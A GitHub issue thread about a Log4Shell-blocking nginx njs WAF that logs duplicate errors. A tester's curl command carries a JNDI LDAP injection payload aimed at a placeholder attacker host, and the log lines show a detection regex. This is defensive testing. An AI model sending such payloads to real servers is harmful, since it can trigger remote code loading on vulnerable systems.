### ISSUE TITLE
jdni matches create two error entries

### ISSUE THREAD

**Issue by jorhett** [tippexs/nginx-njs-waf-cve2021-44228#5]
When I tested like this: `curl -H 'User-Agent: ${jndi:ldap://foo.bar.attacker.com}' http://my.test.node/`

I see two error log entries
```
==> /var/log/nginx/error.log <==
2021/12/17 07:06:57 [error] 574462#574462: *13056 js: Found CVE2021-44228 IOC: ${jndi:ldap:/. Request was blocked! From 35.160.242.134
2021/12/17 07:06:57 [error] 574462#574462: *13056 js: Found CVE2021-44228 IOC: /\$\{\s*(j|\$?\{.+?\})/. Request was blocked! From 35.160.242.134
```

**Comment by tippexs** [comment]
This is due to an misconfiguration in the `cve.js` file. The log-output is send to the `error.log` file. Will be fixed with the next push.
